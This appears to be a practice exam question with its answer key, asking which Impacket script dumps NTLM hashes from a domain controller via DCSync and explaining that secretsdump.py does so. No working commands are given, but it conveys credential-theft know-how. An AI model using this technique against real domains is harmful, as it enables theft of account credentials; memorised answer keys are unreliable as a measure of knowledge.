During a post-exploitation phase you have local Administrator rights on a Windows 10 workstation inside contoso.local. You want to retrieve NTLM password hashes from the domain controller DC01 over the network, without copying the NTDS.dit file, so you can crack them offline later. You have Impacket installed on your attacker machine and prefer to use the DCSync technique. Which Impacket example script should you run to accomplish this goal?
The Impacket script secretsdump.py can authenticate to a domain controller and perform a remote DCSync operation, outputting NTDS password hashes in a format suitable for offline cracking. The other listed scripts serve different purposes: wmiexec.py provides an interactive WMI shell, smbclient.py is a file-share client, and addcomputer.py is designed to create or modify computer accounts in Active Directory rather than dump credentials.
Ask Bash
Bash is our AI bot, trained to help you pass your exam. AI Generated Content may display inaccurate information, always double-check anything important.
What is the DCSync technique?
Open an interactive chat with Bash
What are NTLM password hashes, and why are they important?